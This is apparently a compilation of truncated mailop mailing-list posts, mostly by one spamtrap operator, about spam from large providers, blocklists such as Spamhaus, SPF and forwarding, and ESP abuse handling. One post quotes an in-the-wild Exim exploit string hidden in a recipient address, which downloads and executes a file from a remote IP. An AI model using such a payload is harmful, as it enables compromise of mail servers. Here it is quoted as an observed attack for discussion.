> I'm sure I've had a long explanation on here in the past year, but the
> short answer is if the message is not DKIM valid and you're forwarding, you
> should rewrite the MAIL FROM to a domain you own that will SPF authn the
> message... and try not to forward spam.
That's not how forwarding wo
> Might be convinced with this if it weren't for gmail being the source of
> ~40% of the spam we receive.
And that's after all of the botnets and so on have been blocked
through the use of DNSBLs, I suppose?
Mail subject lines seen in our test/dev spamtraps from Google outbounds
over the past two
> Does anyone know, why Amazon is not using their customer's domain as
> envelope sender?
It appears that customers can decide to do it.
> The Username part looks like a completely new random string on every
> email sent. Or is there a way to match one specific Amazon SES customer?
Parts of it m
> Maybe Brandon can weigh in on or off list, but is there a way for
> spammers to simply relay out Gmail servers if they are Google Cloud?
$ host -t txt sredplus.com
sredplus.com descriptive text
"google-site-verification=gyoD4DWS9XSrAmz9s5Pc9OBLvvowksBJtB0Oi-DAlsQ"
sredplus.com descriptive tex
On Thu, Oct 26, 2023 at 10:07:30AM -0700, Michael Peddemors via mailop wrote:
> Not to be 'snide' Atro, but that part is pretty obvious..
You would have thought so - I would have thought so too. Which is
why I reacted that way to your asking about it.
> It was the technical details I was searchin
> They're a legit Google customer. What's there to marvel at?
https://developers.google.com/gmail/api/guides <- have a look.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg. no. 12815457, VAT ID EE101811635)
Tallinn, Estonia
tel. +372-5883-4269, https://www.koliloks.eu/
> 2a01:111:f403:2e1b::800 sent about 50 Spam Mails in October! Either to
> Spam-Taps or being reported by our customers.
50 in a month and you're worried? :-)
We get between 5000 to 9000 a day
yes, a day
from Microsoft outbounds to our spamtrap collection. About one thousand
of those are fake d
If you want any real action from Cloudflare, you have to jump through the
hoop of filling in the web based abuse form. It sucks but only you can
decide whether it's worth your time and effort.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg. no. 12815457, VAT ID EE101811635)
Tallinn, Esto
On Wed, Nov 22, 2023 at 04:25:36PM +0200, Otto J. Makela via mailop wrote:
> Can someone shed light on a Microsoft/Outlook block list? Our hobby server
> (on upcloud.com) seems to have been blocked for quite some time now.
I have no idea why, but given that upcloud.com spammed my company to
try to
On Thu, Dec 07, 2023 at 12:29:37AM +, Suresh Ramasubramanian via mailop wrote:
> Free trial account on Microsoft 365 being relayed through Microsoft 365
> outbounds by a Hetzner IP
As Suresh says.
I've got a copy too. Nothing unusual in it, it definitely came through
M365 infrastructure. Fr
On Thu, Dec 07, 2023 at 12:44:58PM -0800, Randolf Richardson, Postmaster via mailop wrote:
> I'm not familiar with Hetzner, but APNIC's WHOIS indicates a
> country code of ZZ for the sending IP address's netblock, which the
> ISO lists as "Unknown or unspecified country."
The descr: reve
> Inability to do external DNS lookups makes it impossible to monitor
> for presence on their list.
https://spam.fail/search?ip=127.0.0.2
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy, Helsinki, Finland
tel. +358-44-5000 600, http://www.infinitemho.fi/
> Well, yeah, not really _impossible_, but I was referring to doing
> monitoring based on DNS lookups, as is normal for DNS BL.
Of course.
> Also, Domeneshop confirmed they operate spam.fail as internal list
OK. I tried tagging them on LinkedIn; it's an automatically generated
corporate page wit
> The residential address of the operator is a risk, because spamming is
> a criminal activity in most countries and spammers are sometimes
> organized like the mafia. They hate those lists and try to bring them
> down by all kinds of attacks. Not providing them more attack surface
> than necessary
On Tue, Dec 12, 2023 at 06:22:10PM -0600, Jarland Donnell via mailop wrote:
> Hey friends,
>
> Do me a favor and search your logs for this domain:
> SIBBERTLLC.onmicrosoft.com
Three hits yesterday.
> One customer received 1,347 attempted deliveries from it so far.
> Another, 823. Still counting,
On Wed, Dec 13, 2023 at 05:53:13PM -0500, John R Levine via mailop wrote:
> Phishing their own customers. I suppose in a karmic sense they
> deserve it.
>
> (No, CAUCE is not a customer.)
Neither are the resources where Koli-Lõks OÜ spamtraps received the same. :-)
--
Atro Tossavainen, Founde
> We're an email groups service, like Google Groups. Based on evidence
> provided by Spamhaus, it appears that some groups that migrated from Yahoo
> Groups when Y! Groups shut down contained some Spamhaus spamtrap addresses.
That might be the explanation for why some of your customers' lists
cont
> > https://www.talosintelligence.com/reputation_center/lookup?search=66.175.222.108
> >
> Thanks for this; I wasn't familiar with Talos Intelligence. Do they publish
> a blocklist?
Paying users only. Paying users include the Finnish government's
internal outsourcing center (Valtori) and Telia (ou
> Since most RBLs exchange data,
Source?
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy, Helsinki, Finland
tel. +358-44-5000 600, http://www.infinitemho.fi/
___
mailop mailing list
mailop@mailop.org
https://list.mailop.org/listinfo/mailop
On Fri, Jan 19, 2024 at 03:31:19PM +0100, hg user wrote:
> Ok sorry not "most" but "some may"...
>
> My checkpoint rep said that they get their reputation lists from other
> companies... is it wrong ?
It's possible that Check Point are just an aggregator and don't actually
have first-hand data. B
On Wed, Jan 31, 2024 at 02:03:33PM +, Tarun Singh via mailop wrote:
> Hello Folks,
>
> Is there anyone from Protonmail on this distro? Can you please reach out to
> me offline?
Abuse and postmaster appear to work.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg. no. 12815457, VAT
> Hmm. How do I check that?
> Running nslookup defaults to my local resolver instance.
If it happens silently at the ISP's end, you can't check it - except
indirectly. What are the return codes that you get from your Spamhaus
Zen queries?
--
Atro Tossavainen, Chairman of the Board
Infinite Mho O
> Otherwise you need to stop using Spamhaus -- even if you sign-up,
> perhaps because of the query volume, you still must query them
> directly not via a public resolver.
This is not true.
One of the main points of DQS is that the DNS service you use no
longer matters. They don't need to block th
> ... but that does mean trusting 8.8.8.8 with your private secret.
From Spamhaus documentation:
"access to public mirrors requires the use of a non-public, non-shared DNS
resolver (therefore excluding services like Google Public DNS), while DQS can
use any DNS channel"
https://docs.spamhaus.c
> If the message is "your book is due in five days", it doesn't seem
> reasonable that legitimate addresses are going to belong to
> discontinued domains repurposed as spamtraps within that time
> period. Certainly not a lot of them.
We religiously observe the M3AAWG BCP for maintaining spamtraps
On Fri, Mar 15, 2024 at 08:11:42AM +, Alexandre Dangreau via mailop wrote:
> Hello,
>
> In fact, if you need a /64 IPv6 range you probably use the wrong service. For
> VPS and Public Cloud instances (PCI) the IPv6 range is shared with all the
> VM, so each VM (VPS or PCI) has one single IP
> What I found out is that the email content is searched for email
> addresses and if some hash of that email address matches, the email is
> rejected. It's the full email address. Only the domain part does not
> trigger the issue.
Yeah. To my knowledge, the idea of hash blocklists was first publi
> The SPF of molgen.mpg.de has `~all` (soft fail):
>
> $ dig txt molgen.mpg.de +short
> "v=spf1 ip4:141.14.0.0/16 ~all"
But this is irrelevant. The envelope-from of a forwarded message is
the original one - if you do not deliberately rewrite it - and in such
a case, the SPF that is evalua
> To give you a bit of context, we operate as an ESP, facilitating our
> customers in sending out newsletters.
If you want anybody to have an opinion on this stuff why don't you
identify yourself, the domain names and the IPs involved.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg. no
> Other than that, I'm with you, it is a fraction of a percent of signed
> mail, not common at all.
I'm with Dr Levine; I just looked at all the stuff our spamtrap system
has received in May so far (n~=8M). The exact number I came up with is
0.6%. Also, the percentage of signed mail out of all mai
> PS I’m definitely on the hate side today, having discovered that to actually
> _use_ MS’s implementation of DKIM, I may well have to shell out a 6 figure
> GBP sum. If anyone can demonstrate to me that outbound DKIM signing in
> Exchange Online Protection is possible, and working, without any
On Thu, Jun 20, 2024 at 05:33:47PM +0800, Jeff Peng via mailop wrote:
> BTW, What’s the good way to block messages based on languages?
Analyzing messages for language content first, then being able to
decide based on results. There are multiple libraries for multiple
programming languages that wil
> I agree that overall, the new TLD program has been a failure and makes
> a mockery of ICANN's claim to operate as a public charity in the
> interests of the public.
The second round is just around the corner. I guess you're thrilled.
I am.
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (re
> routed through a separate gateway. Unfortunately, this gateway's IP
> address is heavily compromised and listed on the Spamhaus blacklist.
On specific request from GMX.
> Isn't GMX's approach to spam prevention for non-European regions
> overly simplistic and potentially harmful to legitimate u
On Thu, Jul 18, 2024 at 08:36:09PM +0800, Jeff Pang via mailop wrote:
> Can I setup mailserver to accept messages via ssl/tls only from
> other MTA? How to disable peer MTA send me plaintext mail?
Qiyong, is that you?
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy, Helsinki, Finland
> 550 5.7.1 Connections not accepted from servers without a valid sender
> domain.flph840 Fix reverse DNS for 66.171.0.45
$ host 66.171.0.45
45.0.171.66.in-addr.arpa domain name pointer outbound.eastex.net.
45.0.171.66.in-addr.arpa domain name pointer eastex.net.
It should have exactly one.
http
> There's life at Google. Just pay for GSuite.
Is this the generic advice that all Android device users should take
in order to ensure they will be able to continue to use the Google
account which is essentially mandatory to have in order to use said
device? If so, how come it is not suggested wh
> The flaw for me is that TOTP involves using phone apps I don't know
> the provenance of,
https://github.com/freeotp
is much lighterweight than Microsoft or Google Authenticator anyway.
> that back up the data in a format I don't know
> to my "Google Drive", which is the most protected place I'
On Tue, Mar 03, 2020 at 12:45:52PM -0500, Matt V via mailop wrote:
> Bluehornet is now Mapp digital, Lots of legitimate companies use
> their services to send email.
Seconded.
There's a lot of stuff that shouldn't be there too. I mean, I don't mind
Lindsey Graham sending his begging letters to my
On Wed, Mar 18, 2020 at 07:48:05AM -0700, Michael Peddemors via mailop wrote:
> While you are at it, ask gmx if they can stop leaking obvious Mitre
> attack emails, via their webmail(s) ;)
If I remember correctly, they have two sets of outbounds, the other
one of which delivers the known bad mail.
On Thu, Mar 19, 2020 at 02:40:23PM -0400, John Levine via mailop wrote:
> One of my users reported that I was rejecting mail from Yahoo, and I found it
> was because at least one of Yahoo's outbound addresses 74.6.128.32 is listed
> at bl.mailspike.net.
If you google "mailspike", the first hit has
> I see they're also blocking Gofundme and Constant Contact. Again, not
> pristine but vast numbers of false positives.
>
> Nothing personal but I won't be using their BL again any time soon.
Not my circus, not my monkeys...
Best regards,
--
Atro Tossavainen, Founder, Partner
Koli-Lõks OÜ (reg.
On Sun, Mar 22, 2020 at 02:11:45PM +1000, Ted Cooper via mailop wrote:
> Has anyone run into "Abusix" /potentially/ compromised account
> notification emails before?
Not before, but now that you say, yes.
I have a few dozen samples in spamtraps from Friday Mar 20, never before.
They're both in re
Steve,
> >I am not impressed.
>
> Sorry about that Atro.
Having witnessed what I have today, I have to say I think your concept
is inherently flawed.
Also, my handful-of-dozen spams of this type are apparently a drop in
the ocean when compared to some of the more serious spamtrappers who
claim
On Tue, Mar 24, 2020 at 10:58:14AM -0500, Al Iverson via mailop wrote:
> I'm not understanding how this intersects with spamtraps. What does
> this alert actually notify a network owner of?
> Failed SMTP auth attempt from my IP space?
> Or a failed SMTP auth attempt from someplace else TO my IP spa
> We're reporting usernames and partial password hashes to the domain
> owner (and Abuse Contact for the MX IPs) of accounts that we've seen
> authenticating to one of our more exotic trap types which sees stuff
> that is different to the regular AUTH junk normally observed on a
> regular spam trap
> Uh, well, aren't you curious about how bots harvest that data?
I am indeed not.
Using leaked credentials from Adobe, Dropbox, LinkedIn, or any other
widely available leak that has email addresses and passwords is quite
the sufficient explanation for me. There may be others, but this is
large en
> Once-only invitations to opt-in sound cool.
Not to me - we tell marketers they can't ask permission by spamming,
so I don't think anybody else should get a free pass either.
IT. DOES. NOT. SCALE. Nobody gives a flying flamingo about who the
sender is or what the purpose of the messaging is. IT.
A friend received a mail with an RCPT TO like this:
X-Original-To:
root+${run{x2Fbinx2Fsht-ctx22wgetx2045.148.10.84x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@domain.example
Now it's easy enough for me to see what the idea was - to get a piece of
malware from 45.148.10.84, make it executa
> When you have a business that can cause damage to others (because your own
> customers), you have also contracts and AUPs with your customers. If you need
> to invest in more automation, staff, or both, to make sure that your business
> goes well and doesn't attract "bad customers", because yo
> Why would a DNS server be querying our mirrors?
Have you ever seen anyone instruct anyone else to use 8.8.8.8 or
8.8.4.4 as the DNS server configured on their platform?
I might even go so far as to surmise that would be a default
configuration in the VPSes of more than one provider.
--
Atro T
On Thu, Apr 30, 2020 at 09:18:55PM -0500, Al Iverson via mailop wrote:
> Try https://postmaster.mail.com/en/contact
KAM reported having tried that in the original post.
> In my experience, they do respond.
KAM's experience differed.
On the other hand, they're also represented here in person and
On Mon, May 04, 2020 at 08:49:32PM -0600, Will Boyd via mailop wrote:
> Hi Kyle,
>
> I've located those tickets. It looks like a colleague did reply on
> Wednesday to 4218173 and the reply went to Angelo. I'm not on our abuse
> team but will ping them with both ticket numbers to follow up.
Thanks
On Tue, May 05, 2020 at 02:15:07PM +, Andy Smith via mailop wrote:
> Hello,
>
> On Tue, May 05, 2020 at 06:00:44AM +0300, Atro Tossavainen via mailop wrote:
> > Any chance SendGrid might amend its ticket system so that there would
> > be autoreplies when tickets are crea
On Tue, May 05, 2020 at 07:48:12AM -0700, Michael Peddemors via mailop wrote:
> Since on the topic of SendGrid..
http://mainsleaze.spambouncer.org/2019-11-to-2020-04-in-spamtraps-esps/
The trends for Salesforce and SendGrid are remarkably upwards...
--
Atro Tossavainen, Chairman of the Board
In
> SURBL entered 130.248.* in its blacklist a few time ago.
As far as I know, the SURBL lists URLs - domain names - not IPs.
"SURBLs contain web sites that appear in unsolicited messages. They can be used
with programs that can check message body web sites against SURBLs, such as
SpamAssassin 3
On Mon, May 11, 2020 at 02:07:10PM +0200, Hetzner Blacklist via mailop wrote:
> Just a quick heads-up: Webiron appears to be having issues. Their
> website is down, and their blacklists (combined in all.rbl.webiron.net)
> are listing the world.
Thanks Bastiaan!
The domain was last updated Apr 22.
> I don't see any drop in volumes here. I just spent 10 minutes
> looking at anything hitting traps today from Sendgrid ASN and soon
> found plenty of concern:
I concur with Steve.
http://www.atro.fi/sendgrid.png
Y axis is linear, thin line is trendline.
--
Atro Tossavainen, Founder, Partner
Hey Ray,
> I checked again this morning and its 'back on track' here also now.
>
> I saw a (big) drop here during the day but it has caught up.
Having a bit of longer-term perspective is good.
Having said that, my business partner remarked that "we are also dealing
with a situation where compan
On Thu, May 21, 2020 at 09:29:02AM -0400, Chris via mailop wrote:
> Atro, what was Y axis? Individual emails? 10's? 100's?
More than that. Still only a drop in the ocean when it comes to an ESP
that sends billions a day, of course. We are no Microsoft or Google.
> And you just seemed to say th
On Tue, Jun 02, 2020 at 08:22:40PM +, Michael Wise via mailop wrote:
> It would need to be a standard... a SINGLE standard.
>
> Like the FTC "Do Not Call" list.
What Michael said... And it would be a colossally bad idea.
Anybody think it wouldn't leak and be used specifically to spam some
mo
> In the end, if mailchimp actually DID use the sender's email in the
> MAIL FROM, it might make it easier.. If they did have a way to see
> that this was an invite..
Practically all ESPs use VERP.
https://en.wikipedia.org/wiki/Variable_envelope_return_path
It makes sense for them in so many ways
> Do we hear a ESP actually recommending that all their email gets
> sent to a junk folder .. hehehe..
Way back when, I used to have Procmail rules that would simply forward
anything that was sent from Constant Contact back to their abuse@. They
would not show up in a mailbox of mine, either.
Don
> I've put a subject access request into mailchimp, so I'll see what
> comes back. I guess depends whether mailchimp think they are
> governed by GDPR or not.
They are of course governed by the GDPR... in the role of the data
*processor*. As such, upon receiving such a request they will have to
r
> For me, it was noticing how, despite getting 550'd for an extended period of
> time, Mailchimp just keeps hammering away at the address, never dropping it
> from the list. That, too, is not the behaviour of a responsible ESP.
As I keep saying, we would not have a business at all if any ESPs act
out of timeout, which would result in our not
having a business at all. Not the case.
>
> On Wed, Jun 3, 2020, 11:30 PM Atro Tossavainen via mailop
> wrote:
>
> > > For me, it was noticing how, despite getting 550'd for an extended period of
Luke, thanks for the reply,
> I appreciate the added perspective here. It sounded like you were
> suggesting that ESPs do not suppress invalid email addresses.
The evidence suggests this is the case.
> But it sounds like you are aware that ESPs do suppress invalid email
> addresses, but you beli
> I recommend you try working with them vs calling them out as being
> bad actors - These teams (especially the Mailchimp team) work very
> hard, harder than most hosting companies I would imagine, to stop
> abusive behaviour from their networks sending billions of emails
> around the world. From
> problems as they solve. You're a large ESP so I'd expect more than one
> UCEProtect listing... If you're policing your customer base, and customer
> campaigns aren't using junk lists, there's not much else you can do.
I only have limited visibility to *everything* that Webpower sends, of
course,
> We handle an email forwarder. Recently, we have been having more and
> more issues with people reporting forwarded emails as spam, that end up
> (probably) deteriorating the reputation of our email servers.
You could ask the good folks at iki.fi for tips. They've only been doing
this for 25 year
On Wed, Jul 15, 2020 at 04:49:49PM -0400, Oreva Akpolo via mailop wrote:
> We've been experiencing connection issues sending to ono.com. Specifically,
> all mails to that domain are deferring with the following response:
>
> connect to mx.ono.com[62.42.230.22]:25: Connection timed out
Hey Oreva,
On Mon, Jul 20, 2020 at 04:57:05PM +0200, Heiko Schlittermann via mailop wrote:
> Hi,
>
> I think, that queries for these (A, TXT) records can be used to
> find if the blacklist is working:
>
> 2.0.0.127..zen.dqs.spamhaus.net
> dbltest.com..dbl.dqs.spamhaus.net
>
> Is anybody aware of
The SendGrid account sending these yesterday is 13999362.
Method: get all SendGrid mail from yesterday and today, restrict to
anything that says "quota full" in the subject, look at accounts sending.
Sample size is measured in the dozens, across about ten recipient domains.
They were all sent by
> Does the c581 part also belong to the account id?
I think it does.
> I might consider trying to extract this on my spamtrap and collect them
> to see if there are accounts that keep sending phishing emails for long
> times.
Top senders in Koli-Lõks traps yesterday (n>7000):
8512936 (5%) - mul
> and this also no guarantee for no spam. Recently I got some spam for
> "dates18.com" sent via Casual Networks B.V (on the CSA whitelist) in
> which even the "Imprint"-URLs lead to "Congratulations, you
> confirmed your mailaddress".
Whitelisted senders send plenty of spam.
The requirements also
Hey Marcel,
> That is incorrect. There are exceptions to account for these situations
> where mail sending entities are owned by larger, non-mail sending entities.
I will happily be set straight on this. Reference please?
I am going by
https://certified-senders.org/wp-content/uploads/2017/07/CS
> ... people still DO that? Sorry.
Yes, people do still do that, unless you count yours truly as "not
people" =:->=
It's hard to have HTML/JavaScript rendering related security problems
when you don't. It's nice to run the mail client on a server that you
can ssh to from anything, and it's really
On Fri, Oct 09, 2020 at 03:39:46AM +, Michael Wise via mailop wrote:
>
> I tried doing a WHOIS lookup, but it just referred me here, which doesn't
> have it:
>
> https://www.as14061.net
>
> So far, I've got:
>
> 157.230/16
> 159.89.16
> 159.203/16
> 161.35/16
> 165.227/16
>
Why does Google bounce after accepting a message? At Google's scale,
the potential to become the world's biggest spammer simply through
backscatter is enormous.
** Message blocked **
Your message to [an address on a Google service] has been blocked. See
technical details below for more inform
> * bounce it back to the sender which you assume is valid (since you
> did some due diligence on the ingress server to reject fakes). That way,
> you don't drop the message, and you don't bother your customer. Let the
> sender sort it out if they actually exist.
And this is where they mess up b
> What do you prefer they do with that email if they determined it's
> malicious only after they accepted it?
>
> A: Dropping it: Folks will complain about them "behaving like Microsoft"
>
> B: Send it to the user (even spam folder): Users are not necessarily smart,
> they interact with phish mai
On Fri, Oct 30, 2020 at 11:23:04AM -0700, Brandon Long via mailop wrote:
> The answer is, we try very hard to prevent backscatter and reject messages
> at smtp time instead of bouncing later.
>
> This is not always possible, however.
Thank you for the extensive description of what you do. Whateve
Hey Eric,
> bounces+7456750-0096-
https://www.spamhaus.org/sbl/listings/sendgrid.com shows SBL500803 and
SBL500804 for this customer, so it's clearly been interesting and high-
volume enough for somebody else to notice too.
> bounces+28313-9769-
This is Bullhornmail.com, a recruiting company. I
On Thu, Nov 12, 2020 at 11:08:28PM +0200, Mary via mailop wrote:
>
> Hello,
>
> Anyone knows how to get in touch with the owners of ASN 46664?
https://www.spamhaus.org/sbl/query/SBL461359 suggests you may not wish to.
If Spamhaus is reading this, I'd say this should be on DROP if it isn't.
If
> Is it generally best practice to also scan all outgoing e-mail on a
> shared e-mail cluster for spamminess?
If you're going to prevent some part of the mail stream from leaving your
infrastructure, then possibly, but IMHO marking something as spam and
still sending it on is adding insult to inju
On Tue, Mar 02, 2021 at 10:15:51AM +, André Peters via mailop wrote:
> Wow. Just wow.
Seconded.
I've reached out to the OP on a LinkedIn DM to tell them this has happened.
>
>
> -- Original message --
> From: "Vittorio Bertola via mailop"
> To: "mailop@mailop.org"
> Sent: 0
On Wed, Mar 10, 2021 at 08:36:15AM +, Hans-Martin Mosner via mailop wrote:
> Hello,
>
> does anyone have a pointer to technical details about the recently surfaced
> Exchange vulnerabilities? I would specifically be interested whether the
> exploit(s) depends on the server being exposed to t
> How about senders using @t-online.de as from address?
>
> Can the receiving side implement the same strict alignment rules for
> e-mails with an @t-online.de from address any time soon?
No SPF, no DMARC :-)
(Which you of course knew)
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy
Al Iverson wrote:
> Convince Spamhaus they should be SBL'd, blog about it, sue them, whatever,
> but keep in mind that the tiny number of individual reports to Spamcop
> doesn't really do much by itself. Keep sending reports there, as if they
> get enough reports, it'll cause listings on the SCBL
Over yesterday and today, the following X-Entity-IDs have sent us
mail that somehow related to .zoom.us:
X-Entity-ID: ApJYVCoyRSXXkzbu3h3uow==
X-Entity-ID: lURbVkUlQbFl9F6ROPqNUw==
X-Entity-ID: mDhfxq9OikvIkQieTwdfQA==
X-Entity-ID: 7mxhBNMkQ9yfwz0A5+NG7Q==
These correspond
On Wed, Jul 07, 2021 at 04:08:42PM -0700, Carl Byington via mailop wrote:
>
> On Tue, 2021-07-06 at 23:59 +0300, Atro Tossavainen via mailop wrote:
> > X-Entity-ID: 7mxhBNMkQ9yfwz0A5+NG7Q==
>
> > Return-Path:
> That one has been trying to send spam here for at lea
On Tue, Jul 20, 2021 at 01:09:16PM -0700, Len Shneyder via mailop wrote:
> Hi Brielle,
>
> Can you send me a full unredacted header and I'll take a look at what's
> going on. I'm sorry you didn't get a response earlier to this.
I know I'm not Brielle but I'd like to confirm that Zoom is sending q
On Wed, Aug 04, 2021 at 11:16:15AM -0600, Brielle via mailop wrote:
> Like the title asks?
>
> Still seeing it daily in my logs hitting the system filters... Same
> source accounts, same general bodies with no unsubscribes, sent
> through Zoom's accounts at Sendgrid...
Confirmed, vehemently.
>
> If this was an intentional listing by SpamHaus, I applaud them doing
> a 'shot over the bow'..
XBL listings should be all automated? https://www.spamhaus.org/xbl/
However, there is the fact that
https://www.spamhaus.org/sbl/listings/google.com
has, at the moment, 342 intentional (manually cre
On Sun, Oct 17, 2021 at 01:04:53PM -0700, Dan Mahoney (Gushi) via mailop wrote:
> All,
>
> For years now I've been the target of a number of resumes from
> UAE-based google-groups.
Have a look at these two things.
https://www.spamhaus.org/rokso/spammer/SPM1559/syedsmarketing
https://www.sp
On Thu, Nov 25, 2021 at 12:33:54PM +0200, Mary via mailop wrote:
> Hello everyone,
>
> I noticed today that spamhaus.org is blocking large net blocks of IPv6
> (2a01:7e01) owned by Linode. Pretty much all my clients hosted at Linode are
> being blocked en masse (for IPv6 only).
https://www.spamh
> I first noticed that all outgoing emails that are using IPv6
> > > addresses, are being rejected by anyone using zen.spamhaus.org
> > >
> > > I then tried a bunch of my addresses and they all tested as listed in
> > > https://check.spamhaus.org/
On Thu, Nov 25, 2021 at 04:22:05PM +0200, Mary via mailop wrote:
>
> But that is not a real solution is it?
It is because it's the right thing to do in the first place.
> Maybe linode and spamhaus can come up with a better solution between them?
I would not expect any changes on the policy of t
> Sure. Linode could decide to stop operating a public nuisance and
> police their sewer more effectively. Historically, Spamhaus has a
> long record of delisting network operators who reform their
> abuse-handling.
This isn't even about that. This is only about Linode cramming more
than one custo
> Would it be possible for the two sides (blocklists and a cloud/hosting
> providers) to come together and have some kind of automated notification?
Objection, requires an interest in collaboration from hosting providers.
--
Atro Tossavainen, Chairman of the Board
Infinite Mho Oy, Helsinki, Fin